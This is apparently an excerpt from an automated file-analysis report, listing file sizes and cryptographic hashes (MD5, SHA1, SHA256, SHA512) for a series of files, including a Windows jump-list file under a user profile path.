SHA256fcf063f79a407efbeffc8109ce18ff32928558f314412ad096b71f6746b667f1
SHA5122d2d815a55c09179d346db268e9b36b01278319f691bda7fbaa5174297c71267c986d93ecd438a15ee23baff864e7986c94a955977725b7585fd1ec3f37b78f5
-
Filesize
11KB
MD5bdcdbe5f2b3f453dc2698076323ffada
SHA125f3fd7617205dcec92ba6bcee89670fbfaaeaee
SHA2561c24bbbc3ce6bfbc951e615d706f93a08f0c20a425e7680ed9e723b2f5a7061b
SHA512f3e021d403f46698934d5c4c1b766c70075cab1a2166a8660e173b603384f929fa9bbf630e92521156222b2f3a3b7f2d2b448d310037d61fed83eb936d7554d4
-
Filesize
12KB
MD59f2c86f22a998e43c45547ecef5ea4a2
SHA1efc63e22404a880eec0732672bf9194f47a5083f
SHA256bdb51718182f4993b0f40dc45c43d4b7ffbb167d7e40a8edda3bb126d224010e
SHA5122646b19b855aaa3ed9cbc0b2c2cc099168b9a0795777bb03db874da39ba2a231807541a8c588d3b7714715d2714388500b0ed27cd729cf2b323ae5e9f82f0f6a
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
494KB
MD598ccd44353f7bc5bad1bc6ba9ae0cd68
SHA176a4e5bf8d298800c886d29f85ee629e7726052d
SHA256e51021f6cb20efbd2169f2a2da10ce1abca58b4f5f30fbf4bae931e4ecaac99b
SHA512d6e8146a1055a59cba5e2aaf47f6cb184acdbe28e42ec3daebf1961a91cec5904554d9d433ebf943dd3639c239ef11560fa49f00e1cff02e11cd8d3506c4125f
-
Filesize
35.6MB
MD532f56f3e644c4ac8c258022c93e62765
SHA106dff5904ebbf69551dfa9f92e6cc2ffa9679ba1
SHA25685af2fb4836145098423e08218ac381110a6519cb559ff6fc7648ba310704315
SHA512cae2b9e40ff71ddaf76a346c20028867439b5726a16ae1ad5e38e804253dfcf6ed0741095a619d0999728d953f2c375329e86b8de4a0fce55a8cdc13946d5ad8
-
Filesize
4.9MB
MD501589e66d46abcd9acb739da4b542ce4
SHA16bf1bd142df68fa39ef26e2cae82450fed03ecb6
SHA2569bb4a5f453da85acd26c35969c049592a71a7ef3060bfa4eb698361f2edb37a3
SHA5120527af5c1e7a5017e223b3cc0343ed5d42ec236d53eca30d6decceb2945af0c1fbf8c7ce367e87bc10fcd54a77f5801a0d4112f783c3b7e829b2f40897af8379
-
Filesize
1.0MB
MD53aaf57892f2d66f4a4f0575c6194f0f8
SHA1d65c9143603940ede756d7363ab6750f6b45ab4e
SHA2569e0d0a05b798da5d6c38d858ce1ad855c6d68ba2f9822fa3da16e148e97f9926
SHA512a5f595d9c48b8d5191149d59896694c6dd0e9e1af782366162d7e3c90c75b2914f6e7aff384f4b59ca7c5a1ecccdbf5758e90a6a2b14a8625858a599dcca429b
-
Filesize
56KB
MD571f796b486c7faf25b9b16233a7ce0cd
SHA121ffc41e62cd5f2efcc94baf71bd2659b76d28d3
SHA256b2acb555e6d5c6933a53e74581fd68d523a60bcd6bd53e4a12d9401579284ffd
SHA512a82ea6fc7e7096c10763f2d821081f1b1affa391684b8b47b5071640c8a4772f555b953445664c89a7dfdb528c5d91a9addb5d73f4f5e7509c6d58697ed68432
-
Filesize
414KB
MD5d807c6e79a78915923e848184beab99b
SHA1da0a5da6c3503d008e18e81224782a7d84a13d50
SHA25621339773c68f3e17fb461bc566b0e7dbfdfe5f21275e9d9b89d2624307cb6317
SHA5120b2093df440d0d990f92e6e114c317e0319f069c52be58dfeb576cde68395f8cabe09f746054c301bdf64a466af7ba318e69565e23c17f7a9f10aeeb7cc185fc
-
Filesize
34KB
MD5d3cac4d7b35bacae314f48c374452d71
SHA195d2980786bc36fec50733b9843fde9eab081918
SHA2564233600651fb45b9e50d2ec8b98b9a76f268893b789a425b4159675b74f802aa
SHA51221c8d73cc001ef566c1f3c7924324e553a6dca68764ecb11c115846ca54e74bd1dfed12a65af28d9b00ddaba04f987088aa30e91b96e050e4fc1a256fff20880
-
Filesize
1.4MB
MD56b1ee7baa5240a40b51c8bdc7512739d
SHA1aa3bcb2624b6261c8d6149b149ba5fcefe306f0c
SHA256de89af2aeed45c7bb823675d09310884b655066737eb3bc22bd759ce5c359fbc
SHA5129d4b0f44779c181a2ddabd9001ebf14f89de4784aa719af2871192e4c4289daa3c48932b8c8e02f71891c312bfad34df79b51d9198ac880cb5147f418ccb2e2b
-
Filesize
155KB
MD57fb892e2ac9ff6981b6411ff1f932556
SHA1861b6a1e59d4cd0816f4fec6fd4e31fde8536c81
SHA256a45a29aecb118fc1a27eca103ead50edd5343f85365d1e27211fe3903643c623
SHA512986672fbb14f3d61fff0924801aab3e9d6854bb3141b95ee708bf5b80f8552d5e0d57182226baba0ae8995a6a6f613864ab0e5f26c4dce4eb88ab82b060bdac5
-
Filesize
95KB
MD5f34eb034aa4a9735218686590cba2e8b
SHA12bc20acdcb201676b77a66fa7ec6b53fa2644713
SHA2569d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1
SHA512d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af
-
Filesize
52KB
MD5e1eebd44f9f4b52229d6e54155876056
SHA1052cea514fc3da5a23de6541f97cd4d5e9009e58
SHA256d96f2242444a334319b4286403d4bfadaf3f9fccf390f3dd40be32fb48ca512a
SHA512235bb9516409a55fe7ddb49b4f3179bdca406d62fd0ec1345acddf032b0f3f111c43ff957d4d09ad683d39449c0ffc4c050b387507fadf5384940bd973dab159
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize3KB
MD59a00032d53cfb10dcecd8ac479385836
SHA1eb85da59389650627fcf7c60ac967a009be695d0
SHA25669b9b350330a0a99368c021582e95e720b034ffead90589c352ad78792594006
SHA512b1a61ba3353e24b5ee77a1fe5bc0c250765570319ebc83a32bc9db137b8b156ed7fd1489517615f1c3c92816f927f19df0c77c0cba3ecde971b3e9f5580d70da
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize3KB
MD5900e3aa6ce52c7797e70837b5b1ea6b1
SHA1a7a0c6b7cc70b787c7553210ca0962d9981ae2ee
SHA256221ad880d09befceb6127e393a2b30d99bb2f5a749f231d1f24a4d1373d2a9dc
SHA512e448165e2958d8c1bd40f4cc4b0fe541a382730e9edd758116d96724b0b1e5ffe3e46fde72aba12821d6e52d8beb7c7a7b470cffe00cf2deb22f229d2d7bb03b
-
Filesize
26.7MB
MD59a097019c9663652f4ebc3bcc2dc7f9e
SHA1d004bf13d8c30598ae5e52b1f7bd03745d26d3d8
SHA2568eee381ee1b938419fd0d8593d1e23ade5980e7e098146a26f275048dace7e55
SHA51274c65a324046e0c5d718eb47e872aeb0a4a97450e13bc45f970f464b91675322235e92b913226978c44a59738f3038046a3b31ddf9ae94b7e68198267ea96132
-
Filesize
997KB
MD5ee09d6a1bb908b42c05fd0beeb67dfd2
SHA11eb7c1304b7bca649c2a5902b18a1ea57ceaa532
SHA2567bbf611f5e2a16439dc8cd11936f6364f6d5cc0044545c92775da5646afc7752
SHA5122dd2e4e66d2f2277f031c5f3c829a31c3b29196ab27262c6a8f1896a2113a1be1687c9e8cd9667b89157f099dfb969ef14ae3ea602d4c772e960bc41d39c3d05
-
Filesize
1.1MB
MD5e83d774f643972b8eccdb3a34da135c5
SHA1a58eccfb12d723c3460563c5191d604def235d15
SHA256d0a6f6373cfb902fcd95bc12360a9e949f5597b72c01e0bd328f9b1e2080b5b7
SHA512cb5ff0e66827e6a1fa27abdd322987906cfdb3cdb49248efee04d51fee65e93b5d964ff78095866e197448358a9de9ec7f45d4158c0913cbf0dbd849883a6e90